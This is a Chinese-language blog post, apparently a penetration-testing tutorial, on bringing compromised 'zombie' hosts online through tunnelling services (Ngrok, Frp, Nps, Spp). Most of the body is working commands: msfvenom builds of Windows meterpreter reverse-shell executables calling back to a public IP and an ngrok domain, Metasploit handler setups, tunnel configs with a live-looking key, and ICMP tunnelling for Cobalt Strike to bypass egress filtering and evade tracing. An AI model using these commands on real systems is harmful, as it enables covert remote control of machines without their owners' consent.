<!DOCTYPE html>
<html lang="zh-CN" color-mode="light">

  <head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <meta name="keywords" content="" />
  <meta name="author" content="F4tty" />
  <meta name="description" content="" />
  
  
  <title>
    
      内网穿透上线 
      
      
      |
    
     F4tty
  </title>

  
    <link rel="apple-touch-icon" href="/images/favicon.png">
    <link rel="icon" href="/img/favicon.ico">
  

  <!-- Raleway-Font -->
  <link href="https://fonts.googleapis.com/css?family=Raleway&display=swap" rel="stylesheet">

  <!-- hexo site css -->
  <link rel="stylesheet" href="/css/main.css" />
  <link rel="stylesheet" href="//at.alicdn.com/t/font_1886449_67xjft27j1l.css" />
  <!-- 代码块风格 -->
  

  <!-- jquery3.3.1 -->
  
    <script defer type="text/javascript" src="/plugins/jquery.min.js"></script>
  

  <!-- fancybox -->
  
    <link href="/plugins/jquery.fancybox.min.css" rel="stylesheet">
    <script defer type="text/javascript" src="/plugins/jquery.fancybox.min.js"></script>
  
  
<script src="/js/fancybox.js"></script>


  

  

  <script>
    var html = document.documentElement
    const colorMode = localStorage.getItem('color-mode')
    if (colorMode) {
      document.documentElement.setAttribute('color-mode', colorMode)
    }
  </script>
<meta name="generator" content="Hexo 6.2.0"></head>


  <body>
    <div id="app">
      <div class="header">
  <div class="avatar">
    <a href="/">
      <!-- 头像取消懒加载，添加no-lazy -->
      
        <img src="/img/avatar.jpg" alt="">
      
    </a>
    <div class="nickname"><a href="/">F4tty</a></div>
  </div>
  <div class="navbar">
    <ul>
      
        <li class="nav-item" data-path="/">
          <a href="/">主页</a>
        </li>
      
        <li class="nav-item" data-path="/archives/">
          <a href="/archives/">归档</a>
        </li>
      
        <li class="nav-item" data-path="/categories/">
          <a href="/categories/">分类</a>
        </li>
      
        <li class="nav-item" data-path="/tags/">
          <a href="/tags/">标签</a>
        </li>
      
        <li class="nav-item" data-path="/friends/">
          <a href="/friends/">友链</a>
        </li>
      
        <li class="nav-item" data-path="/about/">
          <a href="/about/">关于我</a>
        </li>
      
    </ul>
  </div>
</div>


<script src="/js/activeNav.js"></script>



      <div class="flex-container">
        <!-- 文章详情页，展示文章具体内容，url形式：https://yoursite/文章标题/ -->
<!-- 同时为「标签tag」，「朋友friend」，「分类categories」，「关于about」页面的承载页面，具体展示取决于page.type -->


  <!-- LaTex Display -->

  
    <script async type="text/javascript" src="/plugins/mathjax/tex-chtml.js"></script>
  
  <script>
    MathJax = {
      tex: {
        inlineMath: [['$', '$'], ['\\(', '\\)']]
      }
    }
  </script>





  <!-- clipboard -->

  
    <script async type="text/javascript" src="/plugins/clipboard.min.js"></script>
  
  
<script src="/js/codeCopy.js"></script>







  

  

  

  
  <!-- 文章内容页 url形式：https://yoursite/文章标题/ -->
  <div class="container post-details" id="post-details">
    <div class="post-content">
      <div class="post-title">内网穿透上线</div>
      <div class="post-attach">
        <span class="post-pubtime">
          <i class="iconfont icon-updatetime mr-10" title="更新时间"></i>
          2022-09-24 00:00:00
        </span>
        
              <span class="post-categories">
                <i class="iconfont icon-bookmark" title="分类"></i>
                
                <span class="span--category">
                  <a href="/categories/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/" title="内网安全">
                    <b>#</b> 内网安全
                  </a>
                </span>
                
              </span>
          
              <span class="post-tags">
                <i class="iconfont icon-tags mr-10" title="标签"></i>
                
                <span class="span--tag mr-8">
                  <a href="/tags/%E5%86%85%E7%BD%91/" title="内网">
                    #内网
                  </a>
                </span>
                
              </span>
          
      </div>
      <div class="markdown-body">
        <h1 id="内网穿透上线"><a href="#内网穿透上线" class="headerlink" title="内网穿透上线"></a>内网穿透上线</h1><p>一个内网中的主机想要控制另一个内网中的主机因为无法直接通讯,所以要用到内网穿透<br><img src="/posts/84ae0305/image-20220924084714528.png" alt="image-20220924084714528"><br>内网穿透简单理解也就是创建一个外网服务器,将我们的端口映射到外网服务器中，当肉鸡流量达到外网服务器后外网服务器把流量转给我们的攻击机</p>
<p>旨在代理连接肉鸡后实现本地渗透肉鸡网络架构</p>
<p>Linux：Proxychains<br>Windows：Sockscap Proxifier<br>穿透项目：Ngrok Frp Spp Nps EW(停更)<br>优点：穿透加密数据，中间平台，防追踪，解决网络问题</p>
<h2 id="Ngrok"><a href="#Ngrok" class="headerlink" title="Ngrok"></a>Ngrok</h2><p><a target="_blank" rel="noopener" href="https://www.ngrok.cc/">https://www.ngrok.cc/</a><br>支持的协议：tcp、http、https<br>支持的类型：正向代理、反向代理<br><img src="/posts/84ae0305/image-20220924090917778.png" alt="image-20220924090917778"><br>使用免费的服务器就行</p>
<p>1、服务端配置：</p>
<p>开通隧道-TCP协议-指向IP和端口-开通隧道-连接隧道<br><img src="/posts/84ae0305/image-20220924091746949.png" alt="image-20220924091746949"><br>红框位置处为攻击机地址<br><img src="/posts/84ae0305/image-20220924092130441.png" alt="image-20220924092130441"></p>
<p>2、客户端连接服务端：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./sunny clientid [隧道id] #控制端连接Ngrok的服务器</span><br></pre></td></tr></table></figure>

<p><img src="/posts/84ae0305/image-20220924092408911.png" alt="image-20220924092408911"><br><img src="/posts/84ae0305/image-20220924092440755.png" alt="image-20220924092440755"><br>成功连接</p>
<p>3、客户端生成后门配置监听：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_">#</span><span class="language-bash">lhost为赠送域名 lport为刚才设置的端口</span></span><br><span class="line">msfvenom -p windows/meterpreter/reverse_tcp lhost=free.idcfengye.com lport=10239 -f exe -o tcp.exe </span><br><span class="line">use exploit/multi/handler</span><br><span class="line">set payload windows/meterpreter/reverse_tcp</span><br><span class="line">set lhost 0.0.0.0</span><br><span class="line">set lport 2222</span><br><span class="line">run</span><br></pre></td></tr></table></figure>

<p><img src="/posts/84ae0305/image-20220924093357416.png" alt="image-20220924093357416"></p>
<h2 id="Frp"><a href="#Frp" class="headerlink" title="Frp"></a>Frp</h2><p><a target="_blank" rel="noopener" href="https://github.com/fatedier/frp">https://github.com/fatedier/frp</a></p>
<p>frp是一个专注于内网穿透的高性能的反向代理应用，支持TCP、UDP、HTTP、HTTPS 等多种协议。可以将内网服务以安全、便捷的方式通过具有公网IP节点的中转暴露到公网。<br>自行搭建，方便修改，成本低，使用多样化，适合对隐私有要求的用户</p>
<p>1.服务端-下载-解压-修改-启动（阿里云主机记得修改安全组配置出入口）</p>
<p>服务器修改配置文件frps.ini：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">[common]</span><br><span class="line">bind_port = 7000</span><br></pre></td></tr></table></figure>

<p>启动服务端：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./frps -c ./frps.ini</span><br></pre></td></tr></table></figure>

<p><img src="/posts/84ae0305/image-20220924094839524.png" alt="image-20220924094839524"></p>
<p>2.控制端-下载-解压-修改-启动</p>
<p>控制端修改配置文件frpc.ini：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">[common]</span><br><span class="line">server_addr = 101.35.21.250</span><br><span class="line">server_port = 7000        #frpc工作端口，必须和上面frps保持一致</span><br><span class="line">[msf]</span><br><span class="line">type = tcp</span><br><span class="line">local_ip = 127.0.0.1</span><br><span class="line">local_port = 5555          #转发给本机的5555</span><br><span class="line">remote_port = 6000         #服务端用6000端口转发给本机</span><br></pre></td></tr></table></figure>

<p>以上配置文件的意思为:建立一个服务器开放一个7000端口用来建立Frp服务用来客户端来建立连接，开通6000端口来接受靶机流量转发给本地的5555端口</p>
<p>启动客户端：</p>
 <figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./frpc -c ./frpc.ini</span><br></pre></td></tr></table></figure>

<p><img src="/posts/84ae0305/image-20220924094911378.png" alt="image-20220924094911378"><br><img src="/posts/84ae0305/image-20220924094925290.png" alt="image-20220924094925290"><br>成功建立连接<br>生成木马</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p windows/meterpreter/reverse_tcp lhost=101.35.21.250 lport=6000 -f exe -o frp.exe</span><br><span class="line">use exploit/multi/handler</span><br><span class="line">set pyload windows/meterpreter/reverse_tcp</span><br><span class="line">set LHOST 0.0.0.0</span><br><span class="line">set LPORT 5555</span><br><span class="line">exploit</span><br></pre></td></tr></table></figure>

<p>3.靶机运行frp.exe即可</p>
<h2 id="Nps"><a href="#Nps" class="headerlink" title="Nps"></a>Nps</h2><p><a target="_blank" rel="noopener" href="https://github.com/ehang-io/nps">https://github.com/ehang-io/nps</a></p>
<p>nps是一款轻量级、高性能、功能强大的内网穿透代理服务器。目前支持tcp、udp流量转发，可支持任何tcp、udp上层协议（访问内网网站、本地支付接口调试、ssh访问、远程桌面，内网dns解析等等……），此外还支持内网http代理、内网socks5代理、p2p等，并带有功能强大的web管理端。</p>
<p>服务端：</p>
<p>1、启动</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">./nps install</span><br><span class="line">./nps</span><br><span class="line">http://IP:8080/  	</span><br></pre></td></tr></table></figure>

<p><img src="/posts/84ae0305/image-20220924111907415.png" alt="image-20220924111907415"></p>
<p>默认密码:admin&#x2F;123</p>
<p>2、创建客户端，生成密匙<br><img src="/posts/84ae0305/image-20220924112035204.png" alt="image-20220924112035204"></p>
<p>修改备注其他默认</p>
<p>3、添加协议隧道，绑定指向</p>
<p>添加客户端隧道<br><img src="/posts/84ae0305/image-20220924112305588.png" alt="image-20220924112305588"></p>
<p>远程绑定5555,指向本地6666<br><img src="/posts/84ae0305/image-20220924112733833.png" alt="image-20220924112733833"><br>该配置意思为肉鸡上线流量发到服务端5555端口服务端会转发到客户端6666端口</p>
<p>客户端：</p>
<p>1、连接服务端：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./npc -server=101.35.21.250:8024 -vkey=uajwhbu9155qh89v #vkey为创建客户端生成的key</span><br></pre></td></tr></table></figure>

<p><img src="/posts/84ae0305/image-20220924113631604.png" alt="image-20220924113631604"></p>
<p>2、生成后门：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p windows/meterpreter/reverse_tcp lhost=101.35.21.250 lport=5555 -f exe -o nps.exe</span><br></pre></td></tr></table></figure>

<p>3、监听后门：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">use exploit/multi/handler</span><br><span class="line">set payload windows/meterpreter/reverse_tcp</span><br><span class="line">set LHOST 0.0.0.0</span><br><span class="line">set LPORT 6666</span><br><span class="line">run</span><br></pre></td></tr></table></figure>

<p><img src="/posts/84ae0305/image-20220924113811812.png" alt="image-20220924113811812"></p>
<h2 id="Spp"><a href="#Spp" class="headerlink" title="Spp"></a>Spp</h2><p><a target="_blank" rel="noopener" href="https://github.com/esrrhs/spp">https://github.com/esrrhs/spp</a><br>支持的协议：tcp、udp、udp、icmp、http、kcp、quic<br>支持的类型：正向代理、反向代理、socks5正向代理、socks5反向代理<br>在对抗项目中有遇到过一些极端环境，比如目标封了tcp，http等常用出网的协议，<br>但是icmp，dns等协议可能因为业务需要或者管理者安全意识不到位导致没有封干净。<br>在这种场景下就可以使用这些容易被忽视的协议进行隧道的搭建。</p>
<p>1、服务端：监听本地的icmp数据</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./spp -type server -proto ricmp -listen 0.0.0.0</span><br></pre></td></tr></table></figure>

<p>2、客户端：将本地的8082给到服务器8081上（TCP封装icmp）</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">spp -name &quot;test&quot; -type proxy_client -server 101.35.21.250 -fromaddr :8082 -toaddr :8081 -proxyproto tcp -proto ricmp</span><br></pre></td></tr></table></figure>

<p>3、CS</p>
<p>监听器1：http 101.35.21.250 8081<br>监听器2：http 127.0.0.1 8082<br>生成后门：监听器2 生成127.0.0.1的后门<br><img src="/posts/84ae0305/image-20220924105605481.png" alt="image-20220924105605481"><br>项目介绍中有更多的协议封装</p>

      </div>
      
        <div class="prev-or-next">
          <div class="post-foot-next">
            
              <a href="/posts/2cb05a91/" target="_self">
                <i class="iconfont icon-chevronleft"></i>
                <span>上一页</span>
              </a>
            
          </div>
          <div class="post-attach">
            <span class="post-pubtime">
              <i class="iconfont icon-updatetime mr-10" title="更新时间"></i>
              2022-09-24 00:00:00
            </span>
            
                  <span class="post-categories">
                    <i class="iconfont icon-bookmark" title="分类"></i>
                    
                    <span class="span--category">
                      <a href="/categories/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/" title="内网安全">
                        <b>#</b> 内网安全
                      </a>
                    </span>
                    
                  </span>
              
                  <span class="post-tags">
                    <i class="iconfont icon-tags mr-10" title="标签"></i>
                    
                    <span class="span--tag mr-8">
                      <a href="/tags/%E5%86%85%E7%BD%91/" title="内网">
                        #内网
                      </a>
                    </span>
                    
                  </span>
              
          </div>
          <div class="post-foot-prev">
            
              <a href="/posts/c1ce75c9/" target="_self">
                <span>下一页</span>
                <i class="iconfont icon-chevronright"></i>
              </a>
            
          </div>
        </div>
      
    </div>
    
  <div id="btn-catalog" class="btn-catalog">
    <i class="iconfont icon-catalog"></i>
  </div>
  <div class="post-catalog hidden" id="catalog">
    <div class="title">目录</div>
    <div class="catalog-content">
      
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%86%85%E7%BD%91%E7%A9%BF%E9%80%8F%E4%B8%8A%E7%BA%BF"><span class="toc-text">内网穿透上线</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Ngrok"><span class="toc-text">Ngrok</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Frp"><span class="toc-text">Frp</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Nps"><span class="toc-text">Nps</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Spp"><span class="toc-text">Spp</span></a></li></ol></li></ol>
      
    </div>
  </div>

  
<script src="/js/catalog.js"></script>




    
      <div class="comments-container">
        







      </div>
    
  </div>


        
<div class="footer">
  <div class="social">
    <ul>
      
        <li>
          <a title="github" target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">
            <i class="iconfont icon-github"></i>
          </a>
        </li>
      
    </ul>
  </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">Copyright © 2022 Oranges</a>
        
    </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">Theme by Oranges | Powered by Hexo</a>
        
    </div>
  
  
</div>

      </div>

      <div class="tools-bar">
        <div class="back-to-top tools-bar-item hidden">
  <a href="javascript: void(0)">
    <i class="iconfont icon-chevronup"></i>
  </a>
</div>


<script src="/js/backtotop.js"></script>



        
  <div class="search-icon tools-bar-item" id="search-icon">
    <a href="javascript: void(0)">
      <i class="iconfont icon-search"></i>
    </a>
  </div>

  <div class="search-overlay hidden">
    <div class="search-content" tabindex="0">
      <div class="search-title">
        <span class="search-icon-input">
          <a href="javascript: void(0)">
            <i class="iconfont icon-search"></i>
          </a>
        </span>
        
          <input type="text" class="search-input" id="search-input" placeholder="搜索...">
        
        <span class="search-close-icon" id="search-close-icon">
          <a href="javascript: void(0)">
            <i class="iconfont icon-close"></i>
          </a>
        </span>
      </div>
      <div class="search-result" id="search-result"></div>
    </div>
  </div>

  <script type="text/javascript">
    var inputArea = document.querySelector("#search-input")
    var searchOverlayArea = document.querySelector(".search-overlay")

    inputArea.onclick = function() {
      getSearchFile()
      this.onclick = null
    }

    inputArea.onkeydown = function() {
      if(event.keyCode == 13)
        return false
    }

    function openOrHideSearchContent() {
      let isHidden = searchOverlayArea.classList.contains('hidden')
      if (isHidden) {
        searchOverlayArea.classList.remove('hidden')
        document.body.classList.add('hidden')
        // inputArea.focus()
      } else {
        searchOverlayArea.classList.add('hidden')
        document.body.classList.remove('hidden')
      }
    }

    function blurSearchContent(e) {
      if (e.target === searchOverlayArea) {
        openOrHideSearchContent()
      }
    }

    document.querySelector("#search-icon").addEventListener("click", openOrHideSearchContent, false)
    document.querySelector("#search-close-icon").addEventListener("click", openOrHideSearchContent, false)
    searchOverlayArea.addEventListener("click", blurSearchContent, false)

    var searchFunc = function (path, search_id, content_id) {
      'use strict';
      var $input = document.getElementById(search_id);
      var $resultContent = document.getElementById(content_id);
      $resultContent.innerHTML = "<ul><span class='local-search-empty'>首次搜索，正在载入索引文件，请稍后……<span></ul>";
      $.ajax({
        // 0x01. load xml file
        url: path,
        dataType: "xml",
        success: function (xmlResponse) {
          // 0x02. parse xml file
          var datas = $("entry", xmlResponse).map(function () {
            return {
              title: $("title", this).text(),
              content: $("content", this).text(),
              url: $("url", this).text()
            };
          }).get();
          $resultContent.innerHTML = "";

          $input.addEventListener('input', function () {
            // 0x03. parse query to keywords list
            var str = '<ul class=\"search-result-list\">';
            var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
            $resultContent.innerHTML = "";
            if (this.value.trim().length <= 0) {
              return;
            }
            // 0x04. perform local searching
            datas.forEach(function (data) {
              var isMatch = true;
              var content_index = [];
              if (!data.title || data.title.trim() === '') {
                data.title = "Untitled";
              }
              var orig_data_title = data.title.trim();
              var data_title = orig_data_title.toLowerCase();
              var orig_data_content = data.content.trim().replace(/<[^>]+>/g, "");
              var data_content = orig_data_content.toLowerCase();
              var data_url = data.url;
              var index_title = -1;
              var index_content = -1;
              var first_occur = -1;
              // only match artiles with not empty contents
              if (data_content !== '') {
                keywords.forEach(function (keyword, i) {
                  index_title = data_title.indexOf(keyword);
                  index_content = data_content.indexOf(keyword);

                  if (index_title < 0 && index_content < 0) {
                    isMatch = false;
                  } else {
                    if (index_content < 0) {
                      index_content = 0;
                    }
                    if (i == 0) {
                      first_occur = index_content;
                    }
                    // content_index.push({index_content:index_content, keyword_len:keyword_len});
                  }
                });
              } else {
                isMatch = false;
              }
              // 0x05. show search results
              if (isMatch) {
                str += "<li><a href='" + data_url + "' class='search-result-title'>" + orig_data_title + "</a>";
                var content = orig_data_content;
                if (first_occur >= 0) {
                  // cut out 100 characters
                  var start = first_occur - 20;
                  var end = first_occur + 80;

                  if (start < 0) {
                    start = 0;
                  }

                  if (start == 0) {
                    end = 100;
                  }

                  if (end > content.length) {
                    end = content.length;
                  }

                  var match_content = content.substr(start, end);

                  // highlight all keywords
                  keywords.forEach(function (keyword) {
                    var regS = new RegExp(keyword, "gi");
                    match_content = match_content.replace(regS, "<span class=\"search-keyword\">" + keyword + "</span>");
                  });

                  str += "<p class=\"search-result-abstract\">" + match_content + "...</p>"
                }
                str += "</li>";
              }
            });
            str += "</ul>";
            if (str.indexOf('<li>') === -1) {
              return $resultContent.innerHTML = "<ul><span class='local-search-empty'>没有找到内容，请尝试更换检索词。<span></ul>";
            }
            $resultContent.innerHTML = str;
          });
        },
        error: function(xhr, status, error) {
          $resultContent.innerHTML = ""
          if (xhr.status === 404) {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>未找到search.xml文件，具体请参考：<a href='https://github.com/zchengsite/hexo-theme-oranges#configuration' target='_black'>configuration</a><span></ul>";
          } else {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>请求失败，尝试重新刷新页面或稍后重试。<span></ul>";
          }
        }
      });
      $(document).on('click', '#search-close-icon', function() {
        $('#search-input').val('');
        $('#search-result').html('');
      });
    }

    var getSearchFile = function() {
        var path = "/search.xml";
        searchFunc(path, 'search-input', 'search-result');
    }
  </script>




        
  <div class="tools-bar-item theme-icon" id="switch-color-scheme">
    <a href="javascript: void(0)">
      <i id="theme-icon" class="iconfont icon-moon"></i>
    </a>
  </div>

  
<script src="/js/colorscheme.js"></script>





        
  
    <div class="share-icon tools-bar-item">
      <a href="javascript: void(0)" id="share-icon">
        <i class="iconfont iconshare"></i>
      </a>
      <div class="share-content hidden">
        
          <a class="share-item" href="https://twitter.com/intent/tweet?text=' + %E5%86%85%E7%BD%91%E7%A9%BF%E9%80%8F%E4%B8%8A%E7%BA%BF + '&url=' + http%3A%2F%2Fexample.com%2Fposts%2F84ae0305%2F + '" target="_blank" title="Twitter">
            <i class="iconfont icon-twitter"></i>
          </a>
        
        
          <a class="share-item" href="https://www.facebook.com/sharer.php?u=http://example.com/posts/84ae0305/" target="_blank" title="Facebook">
            <i class="iconfont icon-facebooksquare"></i>
          </a>
        
      </div>
    </div>
  
  
<script src="/js/shares.js"></script>



      </div>
    </div>
  </body>
</html>
